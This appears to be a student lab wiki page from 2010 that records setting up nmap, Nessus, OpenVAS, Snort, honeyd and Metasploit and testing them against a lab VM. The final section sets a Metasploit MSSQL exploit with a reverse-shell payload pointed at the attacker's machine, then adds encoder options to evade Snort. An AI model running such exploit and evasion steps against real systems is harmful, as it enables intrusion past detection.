• apt-get install nmap
  • trying this installed version 4.76, this is from 2008. A newer version was available from the homepage, so we used that one.
• wget http://nmap.org/dist/nmap-5.21.tgz
  • tar -xvf nmap-5.21.tgz
    • ./configure
    • make
    • make install
      • NMAP SUCCESSFULLY INSTALLED
• testing on the vm is in the next part

• apt-get install nessus nessusd
  • nessus-adduser
  • /etc/init.d/nessusd start
  • Testing this by connecting with the client (nessus) to the server (nessusd) gave some strange errors where “The daemon shut down the communication”
• We again decided to switch to the version from the homepage and downloaded the 4.2.1 version which apparently uses a webpage front end instead of the old client server method.
  • dpkg -i Nessus-4.2.1-ubuntu910_i386.deb
  • register for plugin
  • /etc/init.d/nessusd start
• This did not work, the webpage would not load. Apparently the plugins did not get dowloaded yet. Running the install again, without removing it did the trick and we had to wait for 20 minutes for the plugins to finish downloading.
  • After this we had a big problem with getting flash 10.0 working in firefox. We needed to set the plugin.expose_full_path to true in the firefox about:config page to get the full path of the flash files in the about:plugins page. After this we could remove the flash files. After this we downloaded the Flash_Player_10_for_Linux_(.tar.gz) and put that in /usr/lib/mozilla/plugins directory.
  • Now we could finally use the webpage. See next section

• http://hackertarget.com/2009/06/guide-to-openvas-on-ubuntu-904/
• trying apt-get was again giving problems with getting it installed correctly and getting the plugins so we used the tutorial to install all the source files necessary.
• this took some time, because we needed to ./configure make install all the sources and wait for the plugins to finish downloading and loading onto the server.
• But this did not work, the client seemed to hang when connecting to the server. So we tried another tutorial, only this time for the openvas 3.0 version following another tutorial http://wikisecure.net/security/how-to-install-openvas-ubuntu9.
• I did a clean reinstalled of my work machine and tried again.
• This was almost the same as the previous tutorial, a lot of ./configure make make install and waiting for the plugins.
• The execution is in the next section.

• http://nmap.org/bennieston-tutorial/
  • from the source above, we see their many options to scan a host. We want to scan for open port and get some extra info. A good choise is to use the -sS (to check for open port in a stealthy way) and -A (to get some extra info like the OS fingerprint and versions of programs running)
  • nmap -sS -A 145.100.105.34
• We ran nmap on the host machine of the vm, this resulted in no open ports, which was very strange. We decided to install nmap on a different machine.
• On the other experimental machine this also did not work and did a try on the work machines this gave the following result

+Nmap scan report for 145.100.105.34
  +<code>

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-12 13:58 CEST Nmap scan report for 145.100.105.34 Host is up (0.0041s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS webserver 6.0 139/tcp open netbios-ssn 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM 3389/tcp open microsoft-rdp Microsoft Terminal Service Device type: general purpose Running: Microsoft Windows 2003|XP OS details: Microsoft Windows Server 2003 SP2, Microsoft Windows XP SP2 or Server 2003 SP2 Service Info: OS: Windows

Host script results:

Nmap done: 1 IP address (1 host up) scanned in 77.89 seconds </code>

• we could enter the webpage through https://127.0.0.1:8834/ with the user we added earlier
• We set a policy and did a scan on the meowth IP range.
• This resulted in the VM (IP ::34)+ its router(IP ::33) being scanned

+Nessus scan report part 1 for 145.100.105.34
  +{{2009-2010:students:vic_ding:nessus_scan1.png|}}

• The VM is IP ::34 and Nessus found 7 High risks, looking deeper we see

+Nmap scan report for 145.100.105.34 a little deeper
  +{{2009-2010:students:vic_ding:nessus_scan1_2.png|}}

• that Microsofts smb and mssql are the main risks, you can see more detail in the reportnessus_report_scan1.html

• Trying the client command from the first tutorial
  • OpenVAS-Client -q 127.0.0.1 9390 taarik 123456 iptoscan.txt scanresults.html -T html (iptoscan contains 145.100.105.34)
• This hanged at the connection time. With the following line

Warning: paranoia_level=2 but "trusted_ca" file not found:
cacert.pem

• This is why we switched to another openvas. But when we left it for 5 minutes, we saw it got an extra line

Info: Found and enabled 16842 new plugins.

• five minutes after that we got a scanreport. scanresults.html
• This report shows the same results found with nessus
• Apparently openvas is just slow on my machine, because others did not have problem when executing. And we reinstalled the openvas for nothing, we could have used the first version we installed

• Taking a look at Snort, we saw that snort stopped working and would not start again, apparrently snort is not compatible with the rules we downloaded. So we removed everything and installed the latest snort instead of apt-getting it following this tutorial http://ubuntuforums.org/showthread.php?t=919472
• onlything extra needed was

mkdir /root/snort_dynamicrules_bkp

cd /usr/local/lib/snort_dynamicrules/
cp * /root/snort_dynamicrules_bkp
rm *

• and this file for the /etc/init/snort

+snort detecting Nmap
  +{{2009-2010:students:vic_ding:nmap_snort1.png|}}

• Snort detected some specific NMAP scans and some other request it made.

+snort detecting Nessus
  +{{2009-2010:students:vic_ding:nessus_snort1.png_.png|}}

• Nessus caused over 700 alerts, which shows why nobody goes through them.

+snort detecting OpenVas
  +{{2009-2010:students:vic_ding:openvas_snort1.jpg|}}

• Openvas caused even more alert over 900

• We setup a new Ubuntu 9.04 VM and followed this tutorial to apt-get honeyd.
  • apt-get install honeyd honeyd-common
• We need to use farpd to respond to unused IP's in the meowth Range of 145.100.105.32/27 so we adjusted the /etc/defaults/farp file to

  • # File: /etc/defaults/farpd
    # Defaults for farpd initscript
     
    # Network interface where farpd will listen
    INTERFACE="eth0"
    # Network under control of farpd
    NETWORK=145.100.105.32/27

*and now running farpd /etc/init.d/farpd start

arpd[2970]: listening on eth0: arp and (dst net 145.100.105.32/27) and not ether src 00:16:3e:12:34:af

• Next we need set the way honeyd will run by adjusting the /etc/defaults/honeyd file to:

  • # File: /etc/defaults/honeyd
    # Defaults for honeyd initscript
     
    # run as a daemon
    RUN="yes"
    # Network interface where honeyd will listen
    INTERFACE="eth0"
    # Network under control of honeyd
    NETWORK=145.100.105.32/27
    # Options (collect to use some statistics)
    # -c hostname:port:username:password
    OPTIONS="-c localhost:12345:taarik:123456"

• For the statistics did:
  • added taarik:123456 in /etc/honeypot/honeydstats.conf
  • honeydstats –os_report /etc/honeypot/os.honeydstats –port_report /etc/honeypot/port.honeydstats –spammer_report /etc/honeypot/spam.honeydstats –country_report /etc/honeypot/country.honeydstats -f /etc/honeypot/honeydstats.conf -l localhost -p 12345

    • Starting as background process

• in /etc/honeypot/honeyd.conf we added the next part

+honeyd.conf
  +<code bash>

create win2k set win2k personality “Microsoft Windows 2000 SP2” set win2k default tcp action reset set win2k default udp action reset #set win2k default icmp action block set win2k uptime 3567 set win2k droprate in 13 add win2k tcp port 23 “sh /usr/share/honeyd/scripts/unix/linux/suse8.0/telnetd.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 21 “sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 25 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 80 “sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 110 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 143 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 389 “sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport” add win2k tcp port 5901 “sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport” add win2k udp port 161 “perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private –config=/usr/share/honeyd/scripts/unix/general/snmp”

# This will redirect incomming windows-filesharing back to the source

add win2k udp port 137 proxy $ipsrc:137 add win2k udp port 138 proxy $ipsrc:138 add win2k udp port 445 proxy $ipsrc:445 add win2k tcp port 137 proxy $ipsrc:137 add win2k tcp port 138 proxy $ipsrc:138 add win2k tcp port 139 proxy $ipsrc:139 add win2k tcp port 445 proxy $ipsrc:445

create win2k3 set win2k3 personality “Microsoft Windows NT 4.0 SP3” set win2k3 default tcp action reset set win2k3 default udp action reset #set win2k3 default icmp action block set win2k3 uptime 3567 set win2k3 droprate in 13 add win2k3 tcp port 23 “sh /usr/share/honeyd/scripts/unix/linux/suse8.0/telnetd.sh $ipsrc $sport $ipdst $dport” add win2k3 tcp port 21 “sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport” add win2k3 tcp port 25 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport” add win2k3 tcp port 80 “sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport” add win2k3 tcp port 110 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport” add win2k3 tcp port 143 “sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport” add win2k3 udp port 161 “perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private –config=/usr/share/honeyd/scripts/unix/general/snmp”

bind 145.100.105.36 win2k bind 145.100.105.37 win2k3

</code>

• and now running honeyd /etc/init.d/honeyd start

we are running a lot of services and using the script available from the honeyd-common package on two IPs ::36 and ::37

• example are iis, telnetd, snmp, exchange adn some filesharing

• nmap -sS -sU -A 145.100.105.36
  • -sS is for TCP connect
  • -sU is for UDP connect
  • -A is OS fingerprint and version detection

+Nmap scan report for 145.100.105.36
  +<code>

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:09 CEST Nmap scan report for 145.100.105.36 Host is up (0.0012s latency). Not shown: 1982 closed ports PORT STATE SERVICE VERSION 4/tcp filtered unknown 21/tcp open tcpwrapped 23/tcp open tcpwrapped 25/tcp open tcpwrapped 80/tcp open tcpwrapped 110/tcp open tcpwrapped 139/tcp open tcpwrapped 143/tcp open tcpwrapped 389/tcp open tcpwrapped 445/tcp open tcpwrapped 5901/tcp open tcpwrapped 7911/tcp filtered unknown 19315/tcp filtered unknown 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp filtered snmp 445/udp open|filtered microsoft-ds 16918/udp filtered unknown No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=4%DC=T%G=Y%TM=4BC6CA78%P=i686 OS:-pc-linux-gnu)SEQ(SP=9F%GCD=1%ISR=A7%TI=I%CI=I%II=I%SS=S)SEQ(TI=I%CI=I%I OS:I=I%SS=S)SEQ(SP=9E%GCD=1%ISR=A3%TI=I%CI=I)SEQ(SP=B4%GCD=1%ISR=B6%TI=RD%C OS:I=I%II=I)OPS(O1=M5B4NW0NNT11%O2=M5B4NW0NNT11%O3=M5B4NW0NNT11%O4=M5B4NW0N OS:NT11%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)OPS(O1=M5B4NW0NNT11%O2=%O3=%O4=%O5= OS:M5B4NW0NNT11%O6=M5B4NW0NNT11)WIN(W1=402E%W2=402E%W3=402E%W4=402E%W5=402E OS:%W6=402E)ECN(R=Y%DF=Y%T=40%W=402E%O=M5B4NW0NNT10%CC=N%Q=)T1(R=Y%DF=Y%T=4 OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=402E%S=O%A=S+%F=AS%O=M OS:5B4NW0NNT11%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D OS:F=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O OS:=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80 OS:%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)

Nmap done: 1 IP address (1 host up) scanned in 171.06 seconds </code>

• nmap -sS -sU -A 145.100.105.36

+Nmap scan report for 145.100.105.37
  +<code>

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:15 CEST WARNING: RST from 145.100.105.37 port 21 – is this port really open? Nmap scan report for 145.100.105.37 Host is up (0.0012s latency). Not shown: 1990 closed ports PORT STATE SERVICE VERSION 21/tcp open tcpwrapped 23/tcp open tcpwrapped 25/tcp open tcpwrapped 80/tcp open tcpwrapped 110/tcp open tcpwrapped 143/tcp open tcpwrapped 389/tcp open tcpwrapped 10000/tcp filtered snet-sensor-mgmt 161/udp filtered snmp 781/udp filtered hp-collector No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=4%DC=T%G=Y%TM=4BC6CB84%P=i686 OS:-pc-linux-gnu)SEQ(SP=40%GCD=1%ISR=47%TI=BI%CI=BI%TS=U)SEQ(SP=42%GCD=1%IS OS:R=4A%TI=BI%CI=BI%II=BI%SS=S%TS=U)SEQ(SP=46%GCD=1%ISR=48%TI=BI%CI=BI%TS=U OS:)SEQ(SP=57%GCD=1%ISR=59%TI=RD%CI=BI%II=BI%TS=U)SEQ(SP=42%GCD=1%ISR=4A%TI OS:=BI%CI=BI%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)OPS(O OS:1=%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=2017%W2=2017%W3=2017%W OS:4=2017%W5=2017%W6=2017)ECN(R=Y%DF=Y%T=40%W=2017%O=M5B4%CC=N%Q=)T1(R=Y%DF OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=N%T=40%S=O%A=O%F=AR%RD=0%Q=)T2(R OS:=Y%DF=N%T=40%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=2017%S=O%A=S OS:+%F=AS%O=M5B4%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=S+%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD= OS:Z)

Nmap done: 1 IP address (1 host up) scanned in 71.49 seconds </code>

• The -A option should do the same as -O (OS fingerprint) and -v (version detection), but apparently it returns tcpwrapped for some reason
• redoing the nmap with the -O instead of -A we get a better reply

+Nmap scan report for 145.100.105.36 with -O instead of -A
  +<code>

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-15 10:47 CEST Nmap scan report for 145.100.105.36 Host is up (0.0012s latency). Not shown: 1983 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 389/tcp open ldap 445/tcp open microsoft-ds 5901/tcp open vnc-1 19801/tcp filtered unknown 137/udp filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 17814/udp filtered unknown 35702/udp filtered unknown No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=5.21%D=4/15%OT=21%CT=1%CU=2%PV=N%DS=2%DC=I%G=Y%TM=4BC6D2BB%P=i686 OS:-pc-linux-gnu)SEQ(SP=A1%GCD=1%ISR=A4%TI=I%CI=RD)SEQ(TI=I%CI=RD)SEQ(SP=A0 OS:%GCD=1%ISR=A4%TI=I%CI=RD)SEQ(SP=AC%GCD=1%ISR=AD%TI=I%CI=I%TS=1)SEQ(SP=9E OS:%GCD=1%ISR=A3%TI=I%CI=RD)OPS(O1=M5B4NW0NNT11%O2=M5B4NW0NNT11%O3=M5B4NW0N OS:NT11%O4=M5B4NW0NNT11%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)OPS(O1=M5B4NW0NNT11 OS:%O2=M5B4NW0NNT11%O3=M5B4NW0NNT11%O4=%O5=M5B4NW0NNT11%O6=M5B4NW0NNT11)WIN OS:(W1=402E%W2=402E%W3=402E%W4=402E%W5=402E%W6=402E)ECN(R=Y%DF=Y%T=40%W=402 OS:E%O=M5B4NW0NNT10%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%D OS:F=N%T=40%S=O%A=O%F=AR%RD=0%Q=)T1(R=Y%DF=Y%T=40%S=O%A=O%F=AS%RD=0%Q=)T2(R OS:=N)T3(R=Y%DF=Y%T=40%W=402E%S=O%A=S+%F=AS%O=M5B4NW0NNT11%RD=0%Q=)T4(R=Y%D OS:F=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W OS:=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RI OS:PCK=G%RUCK=G%RUD=G)IE(R=N)

Nmap done: 1 IP address (1 host up) scanned in 50.19 seconds </code>

• nmap does not recognize the OS fingerprint, this is probably because honeyd1.5c is the version we are using and the nmap fingerprints may be too old. Looking in the nmap.prints file you see that not every type of every OS is in there. Nmap recognized for instance Microsoft Windows Server 2003 SP2 in the test at the beginning of this page, but it is not in the file.
• But if the fingerprint is recognised you would not think something is wrong.

• Nessus scan report is here nessus_honeyd.html
• Openvas scan report is here openvas_honeyd.html

• Nessus just lists all the open port of the honeypots, when looking into the open port we see again the tcpwrapper thing. Nessus explained that it's probably some kind of protection. Except for that when looking for OS Identification, we see Nessus did not list one for the honeypots.
• Openvas does the same as Nessus, it also states “Unable to detect remote OS. No match found.” for “ICMP based OS fingerprint results” which makes you suspicious, but does not give you any idea why this happens.

• wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run
• How to install
• chmod +x framework-3.*-linux-x86_64.run
  • sudo ./framework-3.*-linux-x86_64.run
• Say yes to everything in the installer
• Launch the Metasploit console by running 'msfconsole'
• How to use it

• Nessus has found the following weaknesses that were severe
• And which were found exploitable with metasploit, when doing a search with for the “weakness description MS number” in the msfconsole
  • Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution
  • Vulnerability in Server Service Could Allow Remote Code Execution
  • Vulnerability in Server Service Could Allow Remote Code Execution
  • Microsoft Windows SMB Vulnerabilities Remote Code Execution
  • Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution

• We could not find them for these.
  • Vulnerability in SMB Could Allow Remote Code Execution
  • Microsoft SQL Server Multiple Privilege Escalation

• These exploits are done the same way as the next exploit is done, where you just change the exploit, so we will only explain that one.

• use exploit/windows/mssql/ms02_039_slammer
• set payload windows/shell/reverse_tcp
  • payload ⇒ windows/shell/reverse_tcp
• msf exploit(ms02_039_slammer) > set rhost 145.100.105.34
  • rhost ⇒ 145.100.105.34
• msf exploit(ms02_039_slammer) > set lhost 145.100.102.143
  • lhost ⇒ 145.100.102.143
• msf exploit(ms02_039_slammer) > exploit

[*] Started reverse handler on 145.100.102.143:4444 
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.

• Something happend and it was completed apparrently

• We see that snort detected the overflow attempt

From the following presentation Context-keyed-Payload-Encoding.pdf we can conclude we needed some extra command after the standard set option we already did to evade snort. These are:

set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1

Running the previous exploit again with these extra options fooled Snort.

nothing, because of the extra options